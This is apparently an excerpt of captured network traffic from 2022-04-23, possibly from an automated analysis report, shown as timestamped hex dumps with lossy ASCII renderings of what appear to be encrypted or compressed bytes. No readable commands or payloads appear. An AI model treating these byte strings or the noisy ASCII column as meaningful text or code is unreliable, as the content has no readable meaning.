                                                  2022-04-23 06:15:18 UTC1942INData Raw: fd d4 00 cb c9 86 85 61 2c 4b e5 57 e1 d5 f6 ec 12 7b 24 70 ee 86 96 b0 3b 73 dd 4a 9b bb 38 b6 9e 9b 4e c5 3a 01 ff cb 7a 16 2b 62 98 70 74 d6 db f4 9f 8a 4e 06 8f 29 05 e8 05 89 9b c0 6f a8 3a 95 3b 65 b4 35 f2 fa 25 1e 54 ca 43 04 b9 cb 2e ec 9c 42 aa 57 9d 82 c3 cd e6 98 c5 9c 47 bc af 02 81 ba d1 78 05 02 d0 ee e4 95 14 aa 28 c8 b3 07 1f 8c bc 14 90 bf 33 21 b9 d6 c9 fb 8f 4c 9f a3 79 df ff 90 9a 48 c8 35 b5 3a 58 c6 19 fa 87 ad b3 3d 02 8b 29 ab fb c8 e0 86 56 0e f2 59 ad be 77 2d 9d 96 e0 27 36 f6 fa 1d b6 f2 cf 37 39 ca 98 2d 60 ee ec 88 56 a0 2d b7 91 4d 12 c6 8f 04 ff 83 0a d5 69 19 38 ca db c1 f8 8d 18 19 1b 3b 61 c2 75 41 b6 37 d6 f1 95 02 22 62 f0 68 90 bf 8b 4c c7 15 a7 86 90 29 56 8c 3b 50 91 e4 eb c8 03 e8 1b 66 73 80 ee 36 70 99 ad b7 f0
                                                  Data Ascii: a,KW{$p;sJ8N:z+bptN)o:;e5%TC.BWGx(3!LyH5:X=)VYw-'679-`V-Mi8;auA7"bhL)V;Pfs6p
                                                  2022-04-23 06:15:18 UTC1943INData Raw: 04 1d 2c 2f 34 f9 92 89 98 35 f7 3b 0c af cc f9 c2 e8 d3 70 b8 6d ec 3c 04 f3 e8 66 b7 65 b6 af 1a 8d a7 11 e9 24 ce d7 0e 73 9d b6 72 d9 a6 25 22 d5 5b 0f 84 4f 2c fb 95 9f 49 13 3c 2b 29 72 16 a6 98 74 f6 e6 06 c1 c0 c7 e5 38 d8 21 1d 3b 7b 3e b2 8d ae 03 f7 1e 23 3e 8b 3d 54 86 27 ff e9 c3 14 3a ee 81 7e 68 64 af fe ae 70 ba 6f 18 da 0e 7f 17 22 77 eb 17 3e 2e 76 34 89 33 be 44 d6 a4 9c 8e bc 92 e1 94 0e 38 df a1 65 58 e6 dc cf 49 7e bd 2b 06 77 4b 7f b4 89 cc 95 f1 ee b0 e9 1b 63 c7 cc 71 60 fd db 65 53 af 3a c3 ac 20 72 e5 9f 52 1e a2 33 83 22 4a 1f 68 2a 1a 93 bd 3c 3e 65 6c 78 26 b9 99 de 74 c1 32 01 43 49 4c fc f2 b0 31 a2 fa d1 70 f6 db 43 39 e7 fe 1e 78 94 ee 9d 1a 93 38 9f a5 d3 38 78 b3 e3 7b d6 1b 0c ee 6d fc 76 a7 e6 69 9c 7b 4c 12 67 ce d9
                                                  Data Ascii: ,/45;pm<fe$sr%"[O,I<+)rt8!;{>#>=T':~hdpo"w>.v43D8eXI~+wKcq`eS: rR3"Jh*<>elx&t2CIL1pC9x88x{mvi{Lg
                                                  2022-04-23 06:15:18 UTC1945INData Raw: 2b 0e 07 ce 7b e1 fd b0 48 a5 1e 21 9c 27 62 79 a9 82 e1 35 a4 a2 c6 e1 5d 5b 75 cd a9 d4 49 a5 c2 41 e3 1a 83 af 5a aa e6 30 b0 45 fd f9 08 e4 a2 44 a8 4b c4 d0 58 68 ec dc 10 1c e2 8a 05 2e 55 2a ea f9 41 f3 d8 7f 1a 19 58 f9 88 f2 8a 9d 96 32 90 13 66 0c 72 3c f5 f0 b3 83 35 45 1b 23 b7 45 e3 31 bf 21 e9 e7 98 75 a1 df 5c d9 6f 25 f1 d9 a3 4f e6 cd 5d 9b aa 0f 0e 47 f0 9e 17 52 ba 5f 8b 89 d7 6f 57 9c f3 3b 5b e2 58 e0 c3 23 25 39 26 ba cc 10 a6 8a cb 9a b5 e3 b2 56 fd d4 08 5e ce 00 ed 37 e1 dd 3f b7 58 ff c4 db 3e 21 1a 1b ec b3 96 43 e4 f8 d9 d7 3d 14 77 9e d9 13 07 cd de b5 c1 13 ad 46 1b 74 64 9a e5 50 2d 51 92 e9 8e 3d 86 52 01 10 d1 06 c4 60 e5 71 f1 ca 69 0a bd cb 45 c3 fd f3 0c bb fa ba df 44 75 ce 68 9f 0c fa e5 60 94 55 eb b7 b0 ef b5 f1 c5
                                                  Data Ascii: +{H!'by5][uIAZ0EDKXh.U*AX2fr<5E#E1!u\o%O]GR_oW;[X#%9&V^7?X>!C=wFtdP-Q=R`qiEDuh`U
                                                  2022-04-23 06:15:18 UTC1946INData Raw: cb f7 bb a7 d0 16 d5 6b 19 6c 7d 70 d7 78 aa 16 b6 ab 55 a3 f5 4f 93 a0 3c a6 86 b5 eb 49 df cf b4 c1 8a c2 24 b7 2a d9 9f d8 22 69 fb 95 55 93 55 32 5d 43 c5 fd b1 e7 fa 35 7f ce c6 49 3a 2d 68 92 30 34 0f 93 a9 56 ce 1f b6 a0 43 33 7c cf fa 02 90 f9 1b 9c 38 96 19 90 27 ff 89 09 7a c2 75 7d 79 7c 38 55 18 bd 0d 6f 59 c9 f0 3b 3c ed ee 0b e2 f4 15 cc 3b eb 50 82 06 40 35 56 1a 60 bb 05 07 c8 a2 50 7f 6c f2 72 f9 39 de 15 fa 69 c8 a8 9a c5 48 e1 8f 7d 59 c2 b5 9b 43 cc 5c 97 94 0b 83 e3 29 47 24 2d 63 67 0f 96 c6 88 69 3a 5a ca 3f 27 18 dc c2 f2 ef 5e 0a 9e 5b 65 91 8b db f0 ef ca 30 b8 9d df db 82 32 d4 70 36 a9 66 9a ec 38 8c 71 9c 27 8a cb e4 e4 47 76 74 63 fa 1a c8 b8 24 87 97 a7 7d 4b 85 be 3a ef 20 8e 5f fe 1c 83 65 ac c7 7c 71 fc aa 3e f6 0e 69 c1
                                                  Data Ascii: kl}pxUO<I$*"iUU2]C5I:-h04VC3|8'zu}y|8UoY;<;P@5V`Plr9iH}YC\)G$-cgi:Z?'^[e02p6f8q'Gvtc$}K: _e|q>i
                                                  2022-04-23 06:15:18 UTC1947INData Raw: ef fb 4f 37 80 12 bb e6 58 b1 bb 4b 85 3d 70 4b 36 ff 6f 72 83 4c 93 24 03 3b 1d 19 27 89 29 05 13 c6 6f 47 55 40 c8 c9 1c af af a0 b6 57 c1 cd 22 15 96 95 4d cf 6e 84 8d 6b 41 2a e1 fd 05 5b 37 1f 3c 5a 7b b4 26 77 0a 49 65 46 0f 79 24 d5 b7 c6 b1 83 56 7a d3 69 0f 0d cf 42 fc f1 ce 56 bb c5 ba c6 4e 6e 4d 5c 29 32 24 9a eb de 69 6c 72 60 d9 23 97 70 02 cd 36 0e 49 c8 70 e0 e2 6d ce 3a d1 1d 1d 67 c0 77 3a 76 7b b2 df 08 7d f7 db eb 0c 9f a9 68 43 4d aa 22 ce 35 6a 56 82 39 34 44 96 c3 5c 67 46 12 43 bf ef 7d 82 aa f2 d8 2d 32 8b f0 59 d9 e6 5a 85 02 7d 4b d4 ff 85 a8 06 70 8f ca a8 1d c2 a7 8d e5 91 4d 7e c7 3d 15 24 c4 b3 ce 90 78 f0 55 c5 40 a8 cb a8 41 29 41 0a cd f9 7a d2 d4 06 52 b9 13 6b 09 72 44 56 56 77 2f 5b 26 0b 3e 58 04 3e 4e fd 6a 12 af 3f
                                                  Data Ascii: O7XK=pK6orL$;')oGU@W"MnkA*[7<Z{&wIeFy$VziBVNnM\)2$ilr`#p6Ipm:gw:v{}hCM"5jV94D\gFC}-2YZ}KpM~=$xU@A)AzRkrDVVw/[&>X>Nj?
                                                  2022-04-23 06:15:18 UTC1949INData Raw: 64 7e 7f 7f cd 79 ab ca 7b 51 2c b2 e1 6d 0e 25 47 38 dd 5b 8e 8c 37 b6 de 93 e6 12 a1 a4 ec 8e 3b 9b 89 41 6e 6c 1f 03 cb 42 e9 64 f9 f5 f9 7e b3 ed d1 57 39 fd be a6 bd ec 8d 25 fb 15 af 8c 3e 36 1a 9a 02 f5 9b 7f 6a 24 9b 35 89 bf 62 f6 9e ae 8a b9 18 85 e1 f9 a3 28 77 b9 2e b7 9b 8f 99 d4 f2 1a f3 53 bc a0 27 2c 2c 65 19 6d 27 91 60 9c 5b af aa f5 02 8e ca 75 f1 bc ee 48 51 45 a2 f0 d4 d0 a9 a1 8c 34 fa 7f 2d 45 01 29 7c 09 fe ca 49 95 6f 32 41 11 4e b2 cc f0 04 66 e9 13 78 fb fb 78 08 a9 b4 5d 37 6d ac 31 cd e4 ef c0 e8 79 4f d1 d4 82 eb 72 d4 38 f2 89 78 25 e8 2a 06 45 0a 00 a4 bb 50 aa fd cb 3f 33 ac 7f 3b f9 33 09 a7 2b 9f 15 79 57 83 88 b9 7f 78 b1 9f e9 5e 8d 30 71 89 f0 58 fa 4f ce f9 ff f6 1d f0 a7 d7 3e 81 e1 e0 6c a7 fa 44 27 95 80 37 e0 70
                                                  Data Ascii: d~y{Q,m%G8[7;AnlBd~W9%>6j$5b(w.S',,em'`[uHQE4-E)|Io2ANfxx]7m1yOr8x%*EP?3;3+yWx^0qXO>lD'7p
                                                  2022-04-23 06:15:18 UTC1950INData Raw: eb 6e c2 de 15 d7 0d 57 78 7a b1 f7 a0 26 83 51 10 7f 39 18 4d 6b 09 d5 66 3d b3 78 b0 75 0a 77 75 1b e9 72 67 36 90 42 1f 1e 48 bc d4 83 da 38 57 59 bd 5a 98 0c 75 62 f6 44 a5 80 07 4a 07 99 f7 53 c9 a4 8c c7 a0 3c 25 2c 1f b6 3b 2f da 74 be 64 5f 62 9a f0 1c ae 79 5f d9 4a 0f e3 fd e0 6c 6b 80 a7 39 49 2b 2c 73 06 ab 3f 02 d2 d9 ea 34 a7 14 90 42 d2 ac 24 29 0d bf 27 ff c5 9d f1 5b 48 3c 07 7d 33 6b e8 90 40 77 8c 0a 43 4e 08 5e 1a 58 46 5e 7a dc 1f 04 a0 e5 f2 d3 7a 8a 55 a8 2f 8f fc 45 e9 45 2d 5f 65 78 f0 61 fb e4 a1 d8 4c 21 ca 3b c0 35 3b 3d ff 96 4b bd fa 94 2c 58 ed dd 73 fc 54 61 fb b0 2e ba 4a 39 c1 fa 03 05 4a e6 a6 0c 87 48 ae 3b 50 16 a4 8d 99 38 dd 52 5c cf 0d 89 56 b9 13 91 c3 2d cd 5b 33 8e 9b ef 67 88 47 3e fc 99 33 b3 ae 2d 99 51 32 d5
                                                  Data Ascii: nWxz&Q9Mkf=xuwurg6BH8WYZubDJS<%,;/td_by_Jlk9I+,s?4B$)'[H<}3k@wCN^XF^zzU/EE-_exaL!;5;=K,XsTa.J9JH;P8R\V-[3gG>3-Q2
                                                  2022-04-23 06:15:18 UTC1951INData Raw: 15 55 52 3a c3 35 38 ec 0e e4 22 48 92 68 51 af ff b8 4f 6c 14 23 78 ac db 5e 4c 09 23 81 10 0b d2 75 5a 20 7f e0 80 8b cb 27 c8 ba 04 36 d2 11 43 d8 31 d4 ab ed a1 5d 48 df f4 b8 b1 ff 34 4a 53 99 1a 3e 1f 29 9f e8 86 19 00 9c d7 59 92 1a 83 71 01 0f bb 5d 6a 95 c8 e2 56 80 f2 2c c0 d6 c9 08 ee e0 8b 8a 3a e8 37 1b 30 6e 51 18 1a 9d 1c 25 1b 59 15 16 f7 b2 cd 04 9d 4f 84 4d 95 3b a7 b1 a7 91 12 6e 9e d0 fe a2 77 da e6 98 65 9f 26 bc f3 3b 2f da 0d 03 83 d1 f9 a7 fc a3 24 5c cd 70 37 4e bf ba c3 44 1f b3 37 96 53 44 16 7e fe 8c ef 14 8b 8d 3d 76 f9 57 8d 73 6b 2c 84 a5 f0 a0 ba fe 20 b5 9d f0 35 2c 78 14 76 70 2f 04 90 d4 74 cf a2 c6 3a d6 8d 55 98 9b 07 82 e1 0c 97 d9 7e c0 8b 4a c6 54 44 df 07 f7 e5 04 79 06 ec b2 e0 e7 c8 12 14 66 91 3b 90 b9 d2 fe 30
                                                  Data Ascii: UR:58"HhQOl#x^L#uZ '6C1]H4JS>)Yq]jV,:70nQ%YOM;nwe&;/$\p7ND7SD~=vWsk, 5,xvp/t:U~JTDyf;0
                                                  2022-04-23 06:15:18 UTC1956INData Raw: db a4 97 16 94 1f db ab f0 4d c1 fc 22 45 f6 c9 b0 cb 6c fe 48 23 29 56 b1 e8 11 5d 73 22 9e a5 4c 13 38 fe 26 96 1c f6 32 3b 0a cb 3c 5c 8f aa db bc 10 9b 20 40 da df 76 19 ee 75 ae 19 72 ae ce e2 ee 61 96 e6 b7 80 47 ca 0d a1 e7 dd 8b e4 fc 3b da 06 24 9c b4 85 5e 34 df d0 c7 85 01 96 69 5b db f2 d4 5c 54 96 91 9f 77 e5 e5 ec 7c 5e 5f 44 7c 2f 30 17 3a 88 d4 02 40 5b 67 8f 3d c3 5a 47 e4 b0 ab 9f 99 87 bf 7c d5 87 2f 86 5f e7 03 12 3b b0 49 6b 69 58 fc da 14 3f e5 1b 74 bb 8f 8c 53 53 31 c7 4a 8c d5 a6 c4 7d 90 cd 1a 4c d6 76 ab f4 e2 a7 97 fa bf 89 ee f4 a2 52 66 44 d6 53 a7 46 0a 4e 99 1a a3 3c 14 ae bf f7 ea d5 5c 9d c5 87 84 78 bb d3 cb de 0f 01 9e e5 53 e7 ca 99 17 fa 8f d8 8f a6 a0 e9 89 9f 5e 8e 1f 61 62 00 5f 27 c1 87 c8 44 35 38 ef bb 37 54 4c
                                                  Data Ascii: M"ElH#)V]s"L8&2;<\ @vuraG;$^4i[\Tw|^_D|/0:@[g=ZG|/_;IkiX?tSS1J}LvRfDSFN<\xS^ab_'D587TL
                                                  2022-04-23 06:15:18 UTC1960INData Raw: b2 12 48 b1 07 1e e4 a8 20 ca 0f e1 72 8e 1f a2 a6 d6 d7 26 3a 93 52 98 88 c0 c7 89 4d 7a 62 a7 15 0f a0 fc b6 29 85 de 28 01 86 c5 f0 e2 c9 44 45 70 2b 1b 77 79 f1 8c 79 c7 59 76 fc 05 ae e4 e4 1f 5b 4e 47 33 e4 dd 47 44 39 15 09 e5 99 b1 dc 73 f2 f7 0f e5 3b 23 d8 ef 37 00 af 5b 46 bd 85 89 87 b2 86 57 59 aa 86 a2 52 99 79 cc c9 ec d8 55 31 c9 5f b8 8c e6 c4 81 25 1a 89 8d 47 24 d3 e4 91 c2 eb 60 26 35 7a ff ed e7 78 9b 4b 83 8d e9 18 a6 0d 27 89 93 d6 54 2f aa f3 4c b0 ab 8a fa 96 82 5b 31 d1 a3 3f 7e 73 69 07 86 b4 9a 29 1f 92 a9 2b d5 eb 9c ee 9b 1b 0b d7 ef e4 f4 46 10 06 65 72 47 64 99 8e 63 69 7d e6 87 01 a1 0c 73 c4 c1 09 be a5 fd 6e f1 27 3e 10 46 98 fa e0 16 96 5f 6f c8 73 e5 e6 6f 88 a5 64 0a ef 9f 74 bb 88 9e 4f c0 3b a0 21 0c e9 41 a5 6b 05
                                                  Data Ascii: H r&:RMzb)(DEp+wyyYv[NG3GD9s;#7[FWYRyU1_%G$`&5zxK'T/L[1?~si)+FerGdci}sn'>F_osodtO;!Ak
                                                  2022-04-23 06:15:18 UTC1961INData Raw: 00 44 b1 6c 08 ae e9 50 13 80 fb 67 63 ce 9a da 91 37 68 19 b6 56 aa a9 05 48 e9 ec bf e5 5f dd 65 69 1c e1 59 ee 96 60 3c c5 24 fd 0b 5f ac 79 15 00 c0 71 40 35 54 95 85 31 4b 82 37 d7 c4 85 48 5c b7 3d 5d 71 9f 9c 05 f4 26 d8 21 d0 1b 59 3d 91 7d 20 75 be 3f a2 02 e1 7c ad 3c 28 4d 44 f9 91 35 df 3b 7a b2 56 0f 63 bf ed 29 ee 7e 1a 9d 7a 28 ca c2 46 8b 74 24 03 aa 85 43 8c 26 25 87 42 67 18 a3 e2 66 ae 20 97 98 f1 b6 be e2 57 e5 32 3c 44 57 66 0f e1 e5 29 57 b2 73 b9 43 f6 16 64 fd c8 01 1b d1 fe ee 14 35 32 68 fb 4a 4f 82 38 20 7e 10 32 4f e3 72 27 b9 e5 3f 88 68 13 ed 56 b7 f5 15 90 b4 e8 12 54 34 c9 2d 83 68 3c ee 7b 7a 8e 71 b0 1a 6b a6 6f 1d 19 c6 18 2e 59 43 da 04 eb 70 df f7 c6 a4 a6 9f db 26 7e 08 66 b0 e5 cf d2 c2 b8 40 9d 46 33 49 dd cc 61 30
                                                  Data Ascii: DlPgc7hVH_eiY`<$_yq@5T1K7H\=]q&!Y=} u?|<(MD5;zVc)~z(Ft$C&%Bgf W2<DWf)WsCd52hJO8 ~2Or'?hVT4-h<{zqko.YCp&~f@F3Ia0
                                                  2022-04-23 06:15:18 UTC1965INData Raw: 5a 68 8c 1b 69 53 89 d6 db 8a 7c 8f c8 48 f6 18 ac 7d d1 8a 69 11 4a 3f f5 53 a9 c0 f5 47 ee 28 71 48 42 b8 b4 44 d2 66 4c ed b1 00 12 4b 6f fa 53 4a 3e 62 37 65 ac 06 95 7c bb a1 75 94 d0 81 7f 46 ff 7c dd 2e 8d b3 57 86 38 a1 ed da 6b e8 0d ac df 42 7b d4 41 57 79 1e bf 0f 14 84 74 24 79 30 c4 5e c6 6e db 2b fb f2 2f 36 a5 f6 90 7e b5 6d 49 e6 c2 4b c6 b0 c3 ff a2 f3 a5 a3 b6 12 71 2f 22 82 20 bb 27 1d 8f b5 bf d5 bf 82 6b 81 6b b3 a4 b7 96 7d f7 07 73 7c 8d 83 af fd 8d fb dd 4b 1c 38 d9 2f f0 82 15 4a 9f c4 85 b8 f0 73 d1 a2 0f 2d 8d cd 46 dd 20 19 b2 77 0c ab 1d df c9 a0 87 21 55 cd a8 93 cb c2 45 56 d9 84 51 98 27 23 1e 4c 84 eb c8 4b ce 86 99 74 48 67 79 7f 96 f8 d4 1d 26 7d f7 e2 26 76 08 88 c7 d5 81 4d af 10 9e 67 6b 65 ba 23 3d d7 c4 ed c7 0b cc
                                                  Data Ascii: ZhiS|H}iJ?SG(qHBDfLKoSJ>b7e|uF|.W8kB{AWyt$y0^n+/6~mIKq/" 'kk}s|K8/Js-F w!UEVQ'#LKtHgy&}&vMgke#=
                                                  2022-04-23 06:15:18 UTC1969INData Raw: 7b f7 12 83 81 a2 a8 21 85 fe 71 ae a9 28 93 e7 75 e2 c4 5a f8 92 b1 c6 ee 09 47 0b 09 e2 c1 42 bb 10 7c 95 84 c0 43 19 09 1a ec 75 35 a6 3b 09 72 6e 12 6f 79 a8 78 e9 8d d5 ca ab 8c e6 b5 cd bd bb 8b c7 db 83 74 7b be 56 17 6c 8c ec 83 3c 46 a3 da 2e c2 3a 82 73 08 cf 51 96 04 b9 c6 10 b6 02 71 9a d5 93 80 65 a0 a9 94 9e 04 39 d6 04 ab f8 33 9e cc a6 ec d2 94 2a ba f8 43 68 60 5c 21 a4 de dd c2 51 da 74 db d1 86 9f 34 b7 11 64 0e aa 47 e2 95 9e 1e cb c0 63 2b a7 eb 3a 7e c8 1b e0 10 c4 41 af 99 b9 52 50 ae 84 1a f4 54 fe c2 d2 5e 63 7c 94 31 ca 18 70 c4 e9 38 8b c5 3a b6 61 e4 03 f9 e4 ba d9 5f 9e 05 83 5e 59 37 8c d7 83 60 e3 7d c0 70 a4 50 4b c1 2a f4 e0 ae 2e e0 14 39 c2 81 09 7e 32 c5 7e e9 72 ee a3 d1 18 6a 10 f9 ed 34 1c ae b1 2b dd 7d 74 c8 18 62
                                                  Data Ascii: {!q(uZGB|Cu5;rnoyxt{Vl<F.:sQqe93*Ch`\!Qt4dGc+:~ARPT^c|1p8:a_^Y7`}pPK*.9~2~rj4+}tb
                                                  2022-04-23 06:15:18 UTC1973INData Raw: 82 4a b2 05 be 72 21 b5 a5 89 70 9c 7e e6 54 dc cc 50 a1 ff 97 37 33 9c c0 7f 17 d3 9d 56 0a 07 cf 0b f3 26 40 70 0c 47 19 f3 2e 65 6b 43 c3 14 b7 5a de 40 dc 0d 32 c1 7f 7d 5f b3 20 e1 c6 86 1e 6c fa 73 e1 6e 4d 46 8e 77 80 94 1c 1a 79 aa 05 9c ff e3 f1 4f e8 eb 37 2f 3b 85 5a ca 85 67 ef 61 13 f4 b0 24 da 4c 07 2b 19 8f 22 9b 97 35 3d df 99 a0 e4 a5 8e b7 51 06 36 a1 1a bb 6f 14 f0 e0 bd 0f bb cc 9d 19 e1 94 85 cf d1 75 46 79 61 99 5a 63 39 f9 00 d9 71 7c 9f 1f 38 fd 71 69 b0 24 95 76 9a e7 c7 0d 20 72 f0 99 5d e5 c3 c8 1f b0 b0 99 1c 75 d0 82 bd ce 9d ee 98 ed fe 6e 3d c5 9c a4 f9 e0 38 19 9f 7f ba 05 f8 4d f2 e6 ce 8d 64 19 da 92 af 94 4d a9 6d 3f e8 b4 5d 1f fa 74 4a 93 68 e7 e7 90 83 68 a9 14 32 d3 50 10 39 3c 2c 1d 7c 1f a3 aa 9b e8 40 5c 88 13 45
                                                  Data Ascii: Jr!p~TP73V&@pG.ekCZ@2}_ lsnMFwyO7/;Zga$L+"5=Q6ouFyaZc9q|8qi$v r]un=8MdMm?]tJhh2P9<,|@\E
                                                  2022-04-23 06:15:18 UTC1977INData Raw: 61 cd dd 01 7b a8 6c 91 08 92 6d c9 b2 42 2b c1 59 7d ad d8 97 9b 87 6d 11 b6 6e 19 7b b3 5e 5e b5 d3 98 66 9d 8e 1f 69 c7 21 8f bb 48 15 cb ed 5c 89 d6 d6 42 12 f3 fc 2b 7c 67 82 81 c4 8e 39 64 21 28 4a 75 84 80 a9 4b 86 eb a1 c5 8b 66 c4 83 0a 1e 66 3c fe 6b 80 5a a6 4d 97 8c a5 ca 3d 4e 8a 2b ad 86 dc d3 fa 35 b8 df cf b3 d7 8e 69 55 9b 80 75 56 71 a0 87 05 44 3c a8 2c f3 0b 37 c3 d3 41 6b e1 4f 95 67 5f 05 e0 cd 91 a6 63 1b 35 fc 67 c7 51 2b f3 c8 77 76 f0 bf 12 33 5e d6 23 4e 33 69 2b 9b 8b 09 cb 30 97 a6 c6 03 5b 75 8b 26 20 bd 50 43 b6 55 16 d8 9b c3 e7 01 47 70 0a 0a 3c 54 08 72 30 9b 8d 18 30 51 18 b3 e2 61 70 72 3a b6 99 3a b7 9b c9 8d 68 1e f9 cd 16 93 06 22 27 ab 9b 8f 13 f9 de b2 e6 0e fe 20 89 04 8e a8 96 e5 b1 dc 48 f3 db b3 3d f2 d0 ee 04
                                                  Data Ascii: a{lmB+Y}mn{^^fi!H\B+|g9d!(JuKff<kZM=N+5iUuVqD<,7AkOg_c5gQ+wv3^#N3i+0[u& PCUGp<Tr00Qapr::h"' H=
                                                  2022-04-23 06:15:18 UTC1981INData Raw: f3 ca 1e 48 b9 b1 79 21 0b b4 0b 64 c9 58 ae 7c 50 1c 1e ee 67 f6 98 1b bc e7 8a 40 ad aa 6c ea a0 f1 85 48 8b f5 0f c8 8d 3e 55 69 b0 74 92 44 2e 85 1d 2d 6f d9 58 90 f5 d9 36 c9 c4 c1 80 a8 10 f0 db cc ef 3a 99 a1 35 a2 e3 8d b0 bb b8 ca 4c 74 24 82 e8 6f 57 50 d6 01 a3 53 42 3a c1 a6 8f c6 3f b7 53 e7 76 39 77 fe 9d ea dd 44 c9 92 a5 03 9c 39 92 dd 62 fa c6 6e b0 9e 2a c4 d5 6a 39 dc 90 bc d6 b9 78 dd 32 27 79 9f 28 fc 75 f5 47 27 ec e5 9a e9 7a 14 d1 23 15 93 48 be 2f 37 d6 65 20 67 9e 03 59 72 86 e7 e5 c9 0d 3a be b0 d3 42 92 5d 34 b6 bd ff 5c a8 af 32 12 6e af 72 cc 5d 80 98 a2 65 2e 95 aa ae ff 2c 19 75 d5 49 33 dd 1b 7b 9c ec c9 fe 75 84 f4 fc 73 c9 58 91 4f 65 7b 12 48 a6 ef ae 3c f0 ec 07 08 85 57 5f 3f d8 2f a7 8d 88 9d 94 c9 84 5d 5a 0d 06 47
                                                  Data Ascii: Hy!dX|Pg@lH>UitD.-oX6:5Lt$oWPSB:?Sv9wD9bn*j9x2'y(uG'z#H/7e gYr:B]4\2nr]e.,uI3{usXOe{H<W_?/]ZG
                                                  2022-04-23 06:15:18 UTC1986INData Raw: 20 53 2e 34 ac 98 07 75 ea fc f8 f5 d2 da 93 45 75 65 df 1e f9 e5 cb fe 77 7e 91 30 68 de c1 65 ac 15 ad a9 10 a7 a0 5d b2 ba f4 71 5b b7 9c b8 3b b3 05 0a 10 ab f3 07 af 66 79 e5 ec 88 2a 77 ed 41 8c 42 dd a7 56 ce 5a 00 ec 83 ff 62 92 95 9a 10 63 c4 22 52 a3 8e c3 45 ac aa 76 5e 19 e6 94 86 5a 82 77 8a 43 a9 86 cd 57 e0 ae 14 cc b1 53 b8 9d f1 f5 79 40 17 04 c5 7a b6 51 7e 62 6f 29 74 fb 60 e6 4d 83 1e 92 0b af 57 d0 47 73 ff 97 74 69 cb 5d 2f 0d 70 5b 75 53 74 4f 5d 03 a8 65 6e 17 d4 a1 e6 74 ca 0b 16 58 1f a2 a2 1b 4b 1f af a5 4d be 00 fb e5 ff c5 3b 28 4e 99 80 64 e8 1c 52 61 95 ef 36 f1 65 5b 60 c5 9a 5b 18 a4 92 c8 fe 81 23 e4 3d 68 90 6f a3 9e ee 96 24 b9 d5 64 98 17 30 5b f5 87 f1 8e d2 be ce 7e 6e ab f0 26 b8 5c 48 99 64 84 c3 c1 00 8f c0 f0 c0
                                                  Data Ascii: S.4uEuew~0he]q[;fy*wABVZbc"REv^ZwCWSy@zQ~bo)t`MWGsti]/p[uStO]entXKM;(NdRa6e[`[#=ho$d0[~n&\Hd
                                                  2022-04-23 06:15:18 UTC1990INData Raw: c2 b0 3e 69 9b fb 5d 2e ce 39 19 87 04 f7 6b 50 dd 31 69 29 d4 c2 eb e1 f0 91 20 07 ee e3 87 3e 96 6a c2 c8 a3 d4 18 26 80 56 5c 7c 18 ff 65 e3 bb 2b ba de 21 ef 28 d3 d6 f5 89 7b 87 f3 5c db 7f 75 df 51 1a 80 71 06 56 b3 13 93 56 aa 68 2a 55 0b 78 5e 21 70 e3 99 53 ab 7d 3d 53 8a da 1d d6 c2 06 33 69 91 18 9b 16 70 7e 06 73 b7 44 6c a1 5d 02 12 17 dc 3b e9 ef d5 23 06 67 5b 72 dc 7a 97 66 06 ec 59 f3 5c 1d e6 aa ca ee 60 14 d3 03 09 98 02 ee 72 75 0a 4e df 9c 19 c8 02 9c c4 f6 2c 6f 94 cc 8e fe bd 6e 20 86 22 a9 3b 3b 9b e7 76 c0 de 86 6c 51 a1 bd f3 3f f0 c4 76 44 dd 73 0a 1c 3d a1 e2 c5 04 4a db 92 5b cc e1 aa 39 05 9c 4e d4 3c e6 01 7c 54 da 42 e0 6b 69 e2 f8 84 af 3e 42 4d d1 a8 79 a9 db d4 72 cc 6d 39 2c ac 91 e4 6a dc 2c 19 01 ac ce 41 4c 24 5e 0a
                                                  Data Ascii: >i].9kP1i) >j&V\|e+!({\uQqVVh*Ux^!pS}=S3ip~sDl];#g[rzfY\`ruN,on ";;vlQ?vDs=J[9N<|TBki>BMyrm9,j,AL$^
                                                  2022-04-23 06:15:18 UTC1993INData Raw: fc 61 a4 eb c6 de bd c5 b3 d9 cc bf 52 49 ff 69 4b 3d c0 4f 85 d1 ce 9c eb 6d 2e 28 59 c3 27 16 40 82 33 54 05 a9 a2 55 7b a1 d8 05 cf 3e 45 e4 13 f2 7e 1c 0e 29 59 f4 f5 75 68 ae 21 c6 7f 2c b4 a3 40 c7 8d 02 73 d9 22 29 fd a2 79 ef 70 e8 9b cc 63 a7 62 6d de b1 de ae 30 9e 01 d8 2b 23 7f 36 2a 66 ac de 90 a2 17 44 52 39 2b 3b 4d 80 b5 53 e8 be 03 ec 91 7f e4 4c 1c a8 11 bf 44 a7 ee 9d dd ee 13 a2 72 5d 22 d3 7c 87 16 f0 ce 6a e9 f0 1d 69 8b 79 d1 45 89 4b 75 23 2e 5b ed 31 d7 a1 53 f4 41 c7 56 6b f4 f4 ef 3b 91 71 a1 9c 00 b8 50 de 4a b1 b3 f7 8b 9f a1 72 00 28 7f c4 97 45 1f 7e fb 89 8d 2a b1 e8 57 21 43 d0 7d ea c2 31 77 7e ec fd 45 22 bd 40 e8 63 ce 27 34 fc 2f c9 75 dc 1b 5c 0a 75 90 90 cc e3 5e f1 ae bf 7d bf b4 40 b7 da 89 27 9b 92 48 b5 6f 7e 20
                                                  Data Ascii: aRIiK=Om.(Y'@3TU{>E~)Yuh!,@s")ypcbm0+#6*fDR9+;MSLDr]"|jiyEKu#.[1SAVk;qPJr(E~*W!C}1w~E"@c'4/u\u^}@'Ho~
                                                  2022-04-23 06:15:18 UTC1997INData Raw: f2 6c 77 cd 61 bc 0a ae 25 4d 6c bf fd 30 d3 95 e9 e2 af 7c 47 a8 9b e9 5d 18 99 b3 d7 e1 7e de 2e b0 1d 35 e5 df a3 4f 89 9a 11 e1 2c 55 16 a3 1e e6 fc 1f 38 8c 16 d8 88 f7 19 67 2f 0a 2f 87 e6 52 67 64 d7 02 08 04 7c 98 9b 4f 57 4c 7a 49 be 49 e7 67 10 57 05 af 6a ce 5d 2b ac 9e f2 8a 94 dd 78 0b 73 9b a7 e8 15 41 22 07 9f c1 b8 d7 30 45 d4 77 89 70 c2 39 e6 08 3b 18 e1 27 e2 c9 d7 a3 c6 37 16 23 a9 47 14 04 2b 2d 4a 16 6f d5 d9 0e 01 6b fc bd a3 7c 6c 27 f3 8f c8 1a 30 71 2a fc 5a 24 d5 28 7d 48 09 f2 92 66 36 10 d0 88 05 06 c7 1c d6 df 41 21 9f bf 36 90 43 3d f3 4b bd 23 31 c6 f3 2f 76 39 43 eb 6b a1 25 37 bc c7 0c 8b ec ad f7 5a 7c bb 56 68 4d cc 39 af 35 32 fa 22 ad b0 ec c0 f3 80 23 44 e4 ff 77 07 84 00 